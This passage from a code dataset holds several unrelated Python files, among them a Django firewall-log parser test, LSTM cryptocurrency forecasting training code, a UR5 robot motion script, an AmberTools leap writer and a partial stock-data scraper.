Tk()\ngui = GUI(root)\nroot.mainloop()\n\n'''\ndef generateRandomPlayer(self):\n return Pl.Player();\n\n\ntestPlayer = Pl.Player(username=\"BOB\", summonerID=120385)\nprint(testPlayer.username)\n\ntestTeam = Te.Team()\ntestTeam.players['player1'] = testPlayer\nprint(testTeam.players['player1'])\nprint(testTeam.players['player1'].summonerID)\n\ntestMatch = Ma.Match()\nprint(testMatch.teams)\nprint(testMatch.teams['team1'])\ntestMatch = Ma.Match(testTeam, testTeam)\nprint(testMatch.teams['team1'])\n'''","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"20106973","text":"from django.test import TestCase\nfrom Assets.models import *\nimport re\n\n# Django的单元测试基于unittest库\nclass AssetsTestCase(TestCase):\n\n # 测试函数执行前执行\n def setUp(self):\n print(\"======in setUp\")\n\n # 需要测试的内容\n def test_add(self):\n filepath = 'static/upload/pf.log'\n f = open(filepath, 'r')\n fileContent = f.readlines()\n for line in fileContent:\n\n line = line.strip()\n # print(line)\n if line.startswith(\"rule add\"):\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ruleId = ''\n for id in re.findall('id (.*?) name', line):\n ruleId = ruleId + \" \" + id\n\n ruleName = \"\"\n for name in re.findall('name \"(.*?)\" sa', line):\n ruleName = ruleName + \" \" + name\n\n ruleSa = \"\"\n for sa in re.findall('sa (.*?) da', line):\n ruleSa = ruleSa + \" \" + sa\n\n ruleDa = \"\"\n for da in re.findall('da \"(.*?)\" izone', line):\n ruleDa = ruleDa + \" \" + da\n\n ruleIzone = \"\"\n for izone in re.findall('izone (.*?) ozone', line):\n ruleIzone = ruleIzone + \" \" + izone\n\n ruleOzone = \"\"\n for ozone in re.findall('ozone (.*?) service', line):\n ruleOzone = ruleOzone + \" \" + ozone\n\n ruleService = \"\"\n for service in re.findall('service (.*?) time', line):\n ruleService = ruleService + \" \" + service\n\n ruleOpentime = \"\"\n for opentime in re.findall('time any log', line):\n ruleOpentime = ruleOpentime + \" \" + opentime\n\n ruleStatus = \"\"\n for service in re.findall('service (.*?) time', line):\n ruleStatus = ruleStatus + \" \" + service\n\n ruleActive = \"\"\n for active in re.findall('type (.*?) id', line):\n ruleActive = ruleActive + \" \" + active\n\n\n comment = line.split(\" \")[-1].replace('\"', \"\")\n\n # ruleAccount = \"\"\n # for service in re.findall('service (.*?) time', line):\n # ruleAccount = ruleAccount + \" \" + service\n\n\n\n\n\n\n\n\n print(ruleId, \"-\", ruleName, \"-\", ruleSa, \"-\", ruleDa, \"-\", ruleIzone, \"-\", ruleOzone, \"-\", ruleService, \"-\", ruleOpentime, \"-\", ruleStatus, \"-\", ruleActive, \"-\", comment)\n\n\n policy = PolicyManage()\n policy.ruleId = ruleId.encode('utf8')\n policy.ruleName = ruleName.encode('utf8')\n policy.ruleSa = ruleSa.encode('utf8')\n policy.ruleDa = ruleDa.encode('utf8')\n policy.ruleIzone = ruleIzone.encode('utf8')\n policy.ruleOzone = ruleOzone.encode('utf8')\n policy.ruleService = ruleService.encode('utf8')\n policy.ruleOpentime = ruleOpentime.encode('utf8')\n policy.ruleStatus = ruleStatus.encode('utf8')\n policy.ruleActive = ruleActive.encode('utf8')\n policy.ruleComment = comment.encode('utf8')\n policy.save()\n\n\n\n # self.assertEqual(student.name, 'aaa')\n\n # 需要测试的内容\n def test_check_exit(self):\n # self.assertEqual(0, FireWallFile.objects.count())\n print(\"======in test_check_exit\")\n\n\n# 测试函数执行后执行\n def tearDown(self):\n # pass\n print(\"======in tearDown\")\n # address = AddressName.objects.all()\n #\n # for line in address:\n # print(line.addressName)\n # print(line.addressIP)\n # print(line.aaddressComment)\n","sub_path":"FireWall/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"358417840","text":"import pandas as pd\nimport numpy as np\ndf = pd.read_csv(\"gossip_time_combied.csv\", index_col=None)\n\ncontents = list(df[\"content\"].values)\nprint(len(contents))\nlabels = list(df[\"label\"].values)\nprint(len(labels))\n\nnum_total = len(labels)\nnum_train = int(0.9 * num_total)\nnum_test = num_total-num_train\nprint(num_train, num_test)\n\nshuffled_arg = np.arange(num_total)\nnp.random.shuffle(shuffled_arg)\n\ncontents = np.asarray(contents)\nlabels = np.asarray(labels)\n\ncontents = contents[shuffled_arg]\nlabels = labels[shuffled_arg]\n\ndata = zip(contents, labels)\n\nl = open(\"gossip_labels.txt\", \"w\")\nc = open(\"gossip_corpus.txt\", \"w\")\nfor i, (content, label) in enumerate(data):\n if i<=num_train:\n dataset = \"train\"\n if i>num_train:\n dataset = \"test\"\n string = \"{}\\t{}\\t{}\".format(str(i), dataset, str(label))\n content = content.replace(\"\\n\", \"\").strip()\n l.write(string+\"\\n\")\n c.write(content+\"\\n\")\nl.close()\nc.close()\n","sub_path":"extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"282676989","text":"'''\nCopyright 2017 Recruit Institute of Technology\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n'''\n\n\nimport sys\nimport logging\nfrom optparse import OptionParser\n\n# Parse commandline arguments\nop = OptionParser()\nop.add_option(\"--query_file\",\n action=\"store\", type=\"string\", dest=\"query_file\",\n help=\"Query file name.\")\nop.add_option(\"--doc_parser\",\n action=\"store\", type=\"string\", dest=\"doc_parser\",\n default=\"koko\",\n help=\"Text parser: koko or spacy.\")\nop.add_option(\"--output_format\",\n action=\"store\", type=\"string\", dest=\"output_format\",\n default=\"text\",\n help=\"Output format: text or json.\")\nop.add_option(\"--log_level\",\n action=\"store\", type=\"string\", dest=\"log_level\",\n default=\"error\",\n help=\"Logging level: info, warning, error.\")\n\n(opts, args) = op.parse_args()\nif len(args) > 0:\n logger.error(\"this script takes no arguments.\")\n\n# Set up logging\nlogging_level_dict = { 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR }\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nch = logging.StreamHandler(sys.stdout)\nch.setLevel(logging_level_dict[opts.log_level])\nformatter = logging.Formatter('%(levelname)s %(asctime)s - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\nwith open(opts.query_file, 'r') as qfile:\n query = qfile.read()\n\n# Process the KOKO query\n\nfrom koko.query_processor import QueryProcessor\nprocessor = QueryProcessor(opts.doc_parser)\nresponse = processor.ProcessQuery(query)\n\n# Print the results\nif opts.output_format == 'text':\n print(\"\\nResults:\\n\")\n print(\"%s %s\" % (\"{:<50}\".format(\"Entity name\"), \"Entity score\"))\n print(\"================================================================\")\n for entity in response.entities:\n print(\"%s %f\" % (\"{:<50}\".format(entity.name), entity.score))\nelse:\n import json\n import jsonpickle\n pickled = jsonpickle.encode(response, unpicklable=False)\n json_result = json.loads(pickled)\n print(json.dumps(json_result, sort_keys=False, indent=2))\n \n","sub_path":"examples/run_koko.py","file_name":"run_koko.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"178878093","text":"\nimport pygame\nimport sys\n\nclass Game:\n \n def __init__(self):\n pygame.init()\n pygame.display.set_caption('buttonmoon')\n self.setup()\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n self.render()\n\n def setup(self):\n self.window = pygame.display.set_mode((1280, 720), 0, 32)\n self.font = pygame.font.SysFont('Arial', 24)\n\n def render(self):\n self.window.fill((0, 0, 0))\n message = self.font.render('hello, world!', True, (255, 30, 230), (0, 0, 0))\n self.window.blit(message, (0, 0))\n pygame.display.update()\n\nif __name__ == '__main__':\n Game()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"292377208","text":"import os\nimport unicodedata, re\nimport pandas as pd\n\nLIB_PATH = os.path.dirname(os.path.realpath(__file__))\nPOTCAR_PATH = \"/home/xzhang1/src/VASP_PSP/potpaw_PBE.54/\"\n\ndef periodic_table_lookup(symbol, column, periodic_table = pd.read_excel(LIB_PATH + '/data/periodic_table.xlsx')):\n \"\"\"\n Args:\n symbol (str): 'Pb'\n column (str): 'pot_encut'\n \"\"\"\n return periodic_table.loc[periodic_table.symbol == symbol, column].values[0]\n\ndef template(i, o, d):\n \"\"\"i.format(d)\n\n Args:\n i (str): input file path\n o (str): output file path\n d (dict):\n \"\"\"\n with open(i, \"r\") as i:\n with open(o, \"w\") as o:\n o.write(\n i.read().format(**d)\n )\n\ndef slugify(value):\n \"\"\"Make a string URL- and filename-friendly.\n\n Args:\n value (unicode): string to be converted\n\n Returns:\n unicode: filename-friendly string\n\n Raises:\n TypeError: if value is not unicode string\n \"\"\"\n value = unicodedata.normalize('NFKD', value)\n value = re.sub(r'[^\\w\\s-]', '', value).strip().lower()\n value = re.sub(r'[-\\s]+', '-', value)\n return value","sub_path":"codebase/toolkit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"226027292","text":"import os\n\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.callbacks import EarlyStopping,ModelCheckpoint\nfrom tensorflow.keras.layers import LSTM,Dropout,Dense,Activation,Input\nfrom tensorflow.keras.models import Model\nfrom utility.dataset_utils import cut_dataset_by_range\n\ndef prepare_input_forecasting(DATA_PATH,crypto,features_to_use):\n df=pd.read_csv(os.path.join(DATA_PATH,crypto),usecols=features_to_use)\n #features_without_symbols = [feature for feature in df.columns if not feature.startswith(\"symbol\")]\n features_without_date_and_symbols = [feature for feature in df.columns if feature != \"Date\" and not feature.startswith(\"symbol\")]\n return df,features_without_date_and_symbols\n\ndef fromtemporal_totensor(dataset, window_considered, output_path, output_name):\n try:\n # pickling is also known as Serialization\n # The pickle module is not secure. Only unpickle data you trust.\n # load is for de-serialize\n # allow_pickle=True else: Object arrays cannot be loaded when allow_pickle=False\n file_path = output_path + \"/crypto_TensorFormat_\" + output_name + \"_\" + str(window_considered) + '.npy'\n lstm_tensor = np.load(file_path, allow_pickle=True)\n print('(LSTM Version found!)')\n return lstm_tensor\n except FileNotFoundError as e:\n print('Creating LSTM version..')\n # an array in this format: [ [[items],[items]], [[items],[items]],.....]\n # -num of rows: window_considered\n # -num of columns: \"dataset.shape[1]\"\n # 1 is the number of elements in\n lstm_tensor = np.zeros((1, window_considered, dataset.shape[1]))\n # for i between 0 to (num of elements in original array - window + 1)\n \"\"\"easy explanation through example:\n i:0-701 (730-30+1)\n i=0; => from day 0 + 30 days \n i=1 => from day 1 + 30 days \n \"\"\"\n for i in range(dataset.shape[0] - window_considered + 1):\n #note (i:i + window_considered) is the rows selection.\n element=dataset[i:i + window_considered, :].reshape(1, window_considered, dataset.shape[1])\n lstm_tensor = np.append(lstm_tensor, element,axis=0)#axis 0 in order to appen on rows\n\n #serialization\n output_path += \"/crypto_\"\n name_tensor = 'TensorFormat_' + output_name + '_' + str(window_considered)\n #since the first element is zero I'll skip it:\n lstm_tensor=lstm_tensor[1:,:]\n np.save(str(output_path + name_tensor),lstm_tensor)\n print('LSTM version created!')\n return lstm_tensor\n\ndef get_training_validation_testing_set(dataset_tensor_format, date_to_predict):\n train = []\n test = []\n index_feature_date = 0\n for sample in dataset_tensor_format:\n # Candidate is a date: 2018-01-30, for example.\n # -1 is used in order to reverse the list.\n #takes the last date in the sample: 2017-01-09, 2017-01..., ... , 2017-02-2019\n #since the last date is 2017-02-2019, then it is before the date to predict for example 2019-03-05, so this sample\n #will belong to the training set.\n candidate = sample[-1,index_feature_date]\n candidate = pd.to_datetime(candidate)\n\n #if the candidate date is equal to the date to predict then it will be in test set.\n #it happens just one time for each date to predict.\n #Test will be: [[items]] in which the items goes N(30,100,200) days before the date to predict.\n #d_validation = pd.to_datetime(date_to_predict) - timedelta(days=3)\n \"\"\"days=[]\n i=number_of_days_to_predict-1\n while i>0:\n d = pd.to_datetime(date_to_predict) - timedelta(days=i)\n days.append(d)\n i-=1\n days.append(pd.to_datetime(date_to_predict))\"\"\"\n if candidate == pd.to_datetime(date_to_predict):\n #remove the \"Data\" information\n sample = sample[:, 1:].astype('float')\n test.append(sample)\n elif candidate < pd.to_datetime(date_to_predict):\n # remove the \"Data\" information\n sample=sample[:,1:].astype('float')\n train.append(sample)\n #return np.array(train), np.array(validation),np.array(test)\n return np.array(train),np.array(test)\n\ndef train_single_target_model(x_train, y_train, num_neurons, learning_rate, dropout, epochs, batch_size,patience, num_categories,\n date_to_predict,model_path='', model=None):\n #note: it's an incremental way to get a final model.\n #\n callbacks = [\n EarlyStopping(monitor='val_loss', patience=patience,mode='min'),\n ModelCheckpoint(\n monitor='val_loss', save_best_only=True, mode='min',\n filepath=model_path+'lstm_neur{}-do{}-ep{}-bs{}-target{}.h5'.format(\n num_neurons, dropout, epochs, batch_size,date_to_predict))\n ]\n if model is None:\n model = Sequential()\n # Add a LSTM layer with 128/256 internal units.\n #model.add(LSTM(units=num_neurons,return_sequences=True,input_shape=(x_train.shape[1], x_train.shape[2])))\n model.add(LSTM(units=num_neurons,input_shape=(x_train.shape[1], x_train.shape[2])))\n #reduce the overfitting\n model.add(Dropout(dropout))\n model.add(Dense(units=num_neurons, activation='relu',name='ReLu'))\n model.add(Dense(units=num_categories, activation='softmax',name='softmax'))\n # optimizer\n adam = Adam(learning_rate=learning_rate)\n model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy'])\n\n history=model.fit(x_train, y_train, epochs=epochs, batch_size=batch_size, validation_split = 0.001,\n verbose=0, shuffle=False,callbacks=callbacks)\n\n return model, history\n\ndef train_multi_target_model(x_train, y_trains_encoded, num_neurons, learning_rate, dropout, epochs, batch_size,patience, num_categories,\n date_to_predict,model_path='', model=None):\n callbacks = [\n EarlyStopping(monitor='val_loss', patience=patience, mode='min'),\n ModelCheckpoint(\n monitor='val_loss', save_best_only=True, mode='min',\n filepath=model_path + 'lstm_neur{}-do{}-ep{}-bs{}-target{}.h5'.format(\n num_neurons, dropout, epochs, batch_size, date_to_predict))\n ]\n #note: it's an incremental way to get a final model.\n #\n inputs_stm = Input(shape=(x_train.shape[1], x_train.shape[2]))\n lstm= LSTM(units=num_neurons)(inputs_stm)\n # reduce the overfitting\n \"\"\"lstm=Dropout(dropout)(lstm)\n lstm = Dense(units=num_neurons, activation='relu')(lstm)\"\"\"\n\n cryptocurrencies=[]\n losses = {}\n losses_weights = {}\n y_train_dict = {}\n loss = \"categorical_crossentropy\"\n loss_weight = 1.0\n i = 0\n while i < len(y_trains_encoded):\n losses['trend_' + str(i)] = loss\n losses_weights['trend_' + str(i)] = loss_weight\n y_train_dict['trend_' + str(i)] = y_trains_encoded[i]\n\n crypto_model = LSTM(units=num_neurons)(inputs_stm)\n # reduce the overfitting\n crypto_model= Dropout(dropout)(crypto_model)\n crypto_model= Dense(units=num_neurons, activation='relu',name=\"ReLu_\"+ str(i))(crypto_model)\n crypto_model=Dense(units=num_categories, activation='softmax', name='trend_' + str(i))(crypto_model)\n cryptocurrencies.append(crypto_model)\n\n \"\"\"crypto_model = Dropout(dropout)(lstm)\n crypto_model = Dense(units=num_neurons, activation='relu', name=\"ReLu_\" + str(i))(crypto_model)\n crypto_model = Dense(units=num_categories, activation='softmax', name='trend_' + str(i))(crypto_model)\n cryptocurrencies.append(crypto_model)\"\"\"\n i += 1\n\n model = Model(\n inputs=inputs_stm,\n outputs=cryptocurrencies,\n name=\"multitarget\")\n\n # initialize the optimizer and compile the model\n adam = Adam(learning_rate=learning_rate)\n model.compile(optimizer=adam, loss=losses, loss_weights=losses_weights,\n metrics=[\"accuracy\"])\n\n\n history = model.fit(x_train, y_train_dict,\n epochs=epochs, validation_split=0.02, batch_size=batch_size,\n verbose=0, shuffle=False, callbacks=callbacks)\n return model, history\n\n\"\"\"def train_model_new(x_train, y_trains_encoded, num_neurons, learning_rate, dropout, epochs, batch_size,patience, num_categories,\n date_to_predict,model_path='', model=None):\n #note: it's an incremental way to get a final model.\n #\n print(x_train.shape)\n inputs = Input(shape=(x_train.shape[1], x_train.shape[2]),batch_size=x_train.shape[0])\n #trend_btc= Sequential()\n trend_btc= LSTM(units=num_neurons)(inputs)\n print(LSTM)\n # reduce the overfitting\n trend_btc= Dropout(dropout)(trend_btc)\n trend_btc= Dense(units=num_neurons, activation='relu')(trend_btc)\n trend_btc=Dense(units=num_categories)(trend_btc)\n trend_btc= Activation('softmax',name=\"trend_btc\")(trend_btc)\n\n\n # trend_btc= Sequential()\n trend_eth = LSTM(units=num_neurons)(inputs)\n # reduce the overfitting\n trend_eth = Dropout(dropout)(trend_eth)\n trend_eth = Dense(units=num_neurons, activation='relu')(trend_eth)\n trend_eth= Dense(units=num_categories)(trend_eth)\n trend_eth = Activation('softmax', name=\"trend_eth\")(trend_eth)\n\n model = Model(\n inputs=inputs,\n outputs=[trend_btc,trend_eth],\n name=\"multitarget\")\n\n losses = {\n \"trend_btc\": \"categorical_crossentropy\",\n \"trend_eth\": \"categorical_crossentropy\",\n }\n loss_weights = {\"trend_btc\": 1.0, \"trend_eth\": 1.0}\n # initialize the optimizer and compile the model\n adam = Adam(learning_rate=learning_rate)\n model.compile(optimizer=adam, loss=losses, loss_weights=loss_weights,\n metrics=[\"accuracy\"])\n plot_model(model, to_file=\"neural_network.png\", show_shapes=True,\n show_layer_names=True, expand_nested=True, dpi=150)\n\n history=model.fit(x_train, {\"trend_btc\": y_trains_encoded[0], \"trend_eth\": y_trains_encoded[1]},\n epochs=epochs, validation_split = 0.02,\n verbose=0, shuffle=False)\n\n return model, history\"\"\"","sub_path":"modelling/techniques/forecasting/training/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":10297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"589386717","text":"VAR = {\n\"NAME\": \"test\", #Name of the project\n\"LIG1_FILE\" : \"LF1.mol2\", #Name of the mol2 of ligand1 (must be in the working directory)\n\"CAP1\" : \"N\",\t\t #Atom numbers (as in the mol2, likely to start in 1) to remove. Numbers separated by commas\n\n\"LIG2_FILE\" : \"LF2.mol2\", #Name of the mol2 of ligand2 (must be in the working directory)\n\"CAP2\" : \"N\", #Atom numbers (as in the mol2, likely to start in 1) to remove. Numbers separated by commas\n\"MORPHOLOGY\" : \"random\", #Morphology to distribute ligands1 and 2. random, janus, and stripe are allowed\n\"LIG1_FRAC\" : \"1.0\", #Fraction of ligand1 to place (0-1.0)\n\"RSEED\" : \"666\", #Random seed for random morphology\n\"STRIPES\" : \"1\", #Number of stripes for stripe morphology. It will start (bottom up with ligand 1)\n\n\"CORE\" : \"au144SR60_NM.pdb\", #Name of the core to coat. Found in COREDIR/CORE\n\n\"COREDIR\" : \"/DATA/SoftwareSFU/IN-HOUSE/NanoModeler/CORES\", #Path to folder containing all the available cores\n\"DEPENDS\" : \"/DATA/SoftwareSFU/IN-HOUSE/NanoModeler/DEPENDENCIES\" #Path to the folder containing all the dependencies that come with NanoModeler\n}\n\nimport numpy as np\ndef read_resname(lig_fname):\n mol2 = np.genfromtxt(lig_fname, delimiter=\"\\n\", dtype='str')\n for i in range(len(mol2)):\n if \"@ATOM\" in mol2[i]:\n resname = mol2[i+1].split()[7]\n return resname\n\ndef write_leap(fname, two_lig_func):\n msj = \"source leaprc.gaff \\n\\n\"\n msj += \"loadamberparams \" + \"TMP/\"+VAR[\"LIG1_FILE\"][:-5]+\".frcmod\\n\"\n\n msj += read_resname(VAR[\"LIG1_FILE\"]) + \" = loadmol3 \" + \"TMP/\"+VAR[\"LIG1_FILE\"]+\"\\n\"\n msj += \"check \" + read_resname(VAR[\"LIG1_FILE\"]) + \"\\n\"\n msj += \"saveoff \" + read_resname(VAR[\"LIG1_FILE\"]) + \" \" + \"TMP/\"+VAR[\"LIG1_FILE\"][:-5]+\".lib\\n\\n\"\n if two_lig_func:\n msj += \"loadamberparams \" + \"TMP/\"+VAR[\"LIG2_FILE\"][:-5]+\".frcmod\\n\"\n msj += read_resname(VAR[\"LIG2_FILE\"]) + \" = loadmol3 \" + \"TMP/\"+VAR[\"LIG2_FILE\"]+\"\\n\"\n msj += \"check \" + read_resname(VAR[\"LIG2_FILE\"]) + \"\\n\"\n msj += \"saveoff \" + read_resname(VAR[\"LIG2_FILE\"]) + \" \" + \"TMP/\"+VAR[\"LIG2_FILE\"][:-5]+\".lib\\n\\n\"\n\n msj += \"loadamberparams \" + VAR[\"DEPENDS\"]+\"/AU.frcmod\\n\"\n msj += \"loadamberparams \" + VAR[\"DEPENDS\"]+\"/ST.frcmod\\n\"\n msj += \"AU = loadmol3 \" + VAR[\"DEPENDS\"]+\"/AU.mol2\\n\"\n msj += \"ST = loadmol3 \" + VAR[\"DEPENDS\"]+\"/ST.mol2\\n\\n\"\n\n msj += \"loadoff \" + \"TMP/\"+VAR[\"LIG1_FILE\"][:-5]+\".lib\\n\"\n if two_lig_func:\n msj += \"loadoff \" + \"TMP/\"+VAR[\"LIG2_FILE\"][:-5]+\".lib\\n\"\n\n msj += VAR[\"NAME\"] + \" = loadpdb \" + \"TMP/\"+VAR[\"NAME\"]+\".pdb \\n\"\n msj += \"saveamberparm \" + VAR[\"NAME\"] + \" \" + \"TMP/\"+VAR[\"NAME\"]+\".prmtop\" + \" \" + \"TMP/\"+VAR[\"NAME\"]+\".inpcrd \\n\"\n msj += \"quit\"\n out = open(fname, \"w\")\n out.write(msj)\n out.close()\n","sub_path":"defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"400767317","text":"\"\"\"\n定义一个天山童姥类 ,类名为TongLao,属性有血量,武力值(通过传入的参数得到)。TongLao类里面有2个方法,\nsee_people方法,需要传入一个name参数,\n如果传入”WYZ”(无崖子),则打印,“师弟!!!!”,如果传入“李秋水”,打印“呸,贱人”,如果传入“丁春秋”,打印“叛徒!我杀了你”\nfight_zms方法(天山折梅手),调用天山折梅手方法会将自己的武力值提升10倍,血量缩减2倍。\n需要传入敌人的hp,power,进行一回合制对打,打完之后,比较双方血量。血多的一方获胜。\n定义一个XuZhu类,继承于童姥。虚竹宅心仁厚不想打架。所以虚竹只有一个read(念经)的方法。每次调用都会打印“罪过罪过”\n加入模块化改造\n\"\"\"\n\n\n# 定义一个天山童姥类 ,类名为TongLao\nclass TongLao:\n # 构造方法,定义童姥属性,血量hp,武力值power(通过传入的参数得到)\n def __init__(self, hp, power):\n self.hp = hp\n self.power = power\n\n # 定义see_people方法,传入一个name参数\n def see_people(self, name):\n # 传入”WYZ”(无崖子),则打印,“师弟!!!!”\n if name == \"无崖子\":\n print(\"师弟!!!!\")\n # 传入“李秋水”,打印“呸,贱人”\n elif name == \"李秋水\":\n print(\"呸,贱人!\")\n # 传入“丁春秋”,打印“叛���!我杀了你”\n elif name == \"丁春秋\":\n print(\"叛徒!我要杀了你!\")\n\n # 定义fight_zms方法(天山折梅手),调用此方法会将自己的武力值提升10倍,血量缩减2倍。\n # 传入敌人的血量en_hp,武力值en_power\n def fight_zms(self, en_hp, en_power):\n hp = self.hp / 2 - en_power\n en_hp = en_hp - self.power * 10\n # 打斗一局,比较胜负\n if hp < en_hp:\n print(\"你给我等着,终会有一天你会败在我的脚下!\")\n elif hp > en_hp:\n print(\"这一天终于到来了,哈哈哈哈哈!哈哈哈哈哈!\")\n else:\n raise Exception(\"哼!小子功夫不错嘛!继续,看我不把你打得落花流水,跪地求饶!\")\n\n\n# 实例化\ntl = TongLao(2000, 1000)\ntl.see_people(\"丁春秋\")\ntl.fight_zms(1000, 2000)\n","sub_path":"practice/python_oo/tonglao.py","file_name":"tonglao.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"280658647","text":"\"\"\"\n Called from Matlab: 12 arguments are xamp, xfreq, xphase, yamp, yfreq, \n yphase, zamp, zfreq, depth, anglex, \n angley, duration\n \n Motions for optimization tasks: 11D paramaterised space\n\"\"\"\n\nimport time\nimport serial\nimport math\nfrom math import pi\nimport numpy\nimport socket\nimport sys\nimport sched\n\nsys.path.append(\"C:/Users/David/Documents/PhD/ur5control\")\nimport waypoints as wp\nimport kg_robot as kgr\n\ntstart = time.time()\n\nurnie = kgr.kg_robot(port=30010,db_host=\"169.254.161.50\")\nurnie.set_tcp(wp.plunger_tcp)\n\n#scheduler used to regularly pass desired positions to servoj \nscheduler = sched.scheduler(time.time, time.sleep)\ndef schedule_it(dt, duration, callable, *args):\n for i in range(int(duration/dt)):\n scheduler.enter(i*dt, 1, callable, args)\n\n#calculate starting position of motion\ndef starting_pos(centrepose, xamp, xphase, yamp, yphase, depth, anglex, angley):\n npose = numpy.add(centrepose, [0, 0, 0.001*(30-depth), 0, 0, 0])\n npose = numpy.add(npose, [0, 0, 0, anglex, angley, 0])\n npose = numpy.add(npose, [xamp*math.sin(xphase), 0, 0, 0, 0, 0])\n npose = numpy.add(npose, [0, yamp*math.sin(yphase), 0, 0, 0, 0])\n urnie.movel(npose)\n \n# main function: moves to desired position at any moment in time\ndef parameter_move(t0, centrepose, xamp, xfreq, xphase, yamp, yfreq, yphase, zamp, zfreq, depth, anglex, angley):\n #start with z height\n npose = numpy.add(centrepose, [0, 0, 0.001*(30-depth), 0, 0, 0])\n #add angles\n npose = numpy.add(npose, [0, 0, 0, anglex, angley, 0])\n t = time.time() - t0\n #x vibrations\n npose = numpy.add(npose, [xamp*math.sin(xfreq*t+xphase), 0, 0, 0, 0, 0])\n #y vibrations\n npose = numpy.add(npose, [0, yamp*math.sin(yfreq*t+yphase), 0, 0, 0, 0])\n #zvibrations\n npose = numpy.add(npose, [0, 0, zamp*math.sin(zfreq*t), 0, 0, 0])\n #pass to UR5\n urnie.servoj(npose, vel=50, control_time=0.05)\n\nurnie.movel(wp.above_tubl, 0.5, 0.02) #move above tub\ncentrepose=numpy.add(wp.above_tubl, [0, 0, -0.03, 0, 0, 0])\n\n#move to starting position\nstarting_pos(centrepose, 0.001*float(sys.argv[1]), (pi/180)*float(sys.argv[3]),\n 0.001*float(sys.argv[4]), (pi/180)*float(sys.argv[6]),\n float(sys.argv[9]), (pi/180)*float(sys.argv[10]),\n (pi/180)*float(sys.argv[11]))\n\ntime.sleep(0.5)\n\nwhile (time.time() - tstart) < 5: #time with matlab script\n continue\n\nt0 = time.time()\n#initialise scheduler\nschedule_it(0.05, float(sys.argv[12]), parameter_move, t0, centrepose,\n 0.001*float(sys.argv[1]), 2*pi*float(sys.argv[2]),\n (pi/180)*float(sys.argv[3]), 0.001*float(sys.argv[4]), 2*pi*float(sys.argv[5]), \n (pi/180)*float(sys.argv[6]), 0.001*float(sys.argv[7]), 2*pi*float(sys.argv[8]),\n float(sys.argv[9]), (pi/180)*float(sys.argv[10]), (pi/180)*float(sys.argv[11]))\n\n#run scheduler calling servoj\nscheduler.run()\n\nurnie.close()\n\n","sub_path":"Call11D.py","file_name":"Call11D.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"603254321","text":"import requests\nimport json\nimport requests_cache\nimport time\nimport logging\nimport pandas as pd\nimport urllib.request\nfrom datetime import date, timedelta, datetime\nfrom pyquery import PyQuery\nfrom pandas_datareader.nasdaq_trader import get_nasdaq_symbols\nfrom .holding import Holding\nfrom financescraper import scraper, conversions\n\nsymbols = get_nasdaq_symbols()\nexpire_after = timedelta(days=5)\nrequests_cache.install_cache('cache_data', expire_after=expire_after)\n\nyahoo_scraper = scraper.YahooScraper()\nusd_converter = conversions.CurrencyConverter('USD')\n\n\n# Scrape name and holdings if any for a given ticker\ndef scrape_ticker(ticker, use_yahoo):\n holdings = []\n data = get_data(ticker, use_yahoo)\n\n # invalid ticker\n if data is None:\n return holdings\n\n if _is_etf(data):\n _get_etf_data(ticker, data, holdings)\n else:\n _get_stock_data(ticker, data, holdings)\n return holdings\n\n\n# Get the nasdaq data for a given ticker\ndef get_data(ticker, useYahoo):\n data = None\n tmp = {'Yahoo': False}\n try:\n data = pd.Series(tmp)\n data = data.append(symbols.loc[ticker])\n except KeyError:\n data = None\n if useYahoo:\n logging.info('Failed to retrieve data for ticker ', ticker, '. Attempting to get it from finance.yahoo.com')\n data = _get_data_from_yahoo(ticker)\n else:\n logging.info('Failed to retrieve data for ticker ', ticker)\n return data\n\n\n# Get latest price for a given ticker\ndef get_price(ticker):\n with requests_cache.disabled():\n quote = _get_iex_data([ticker], ['price'])\n return _round_price(quote[ticker]['price'])\n\n\ndef get_company_data(tickers):\n company_data = {}\n data = _get_iex_data(tickers, ['company'])\n for ticker in tickers:\n if (ticker not in data) and (ticker != ''):\n company = _get_company_from_yahoo(ticker)\n if company is not None:\n data[ticker] = company\n for ticker, stock in data.items():\n quote = stock['company']\n if quote is None:\n continue\n company_data[ticker] = 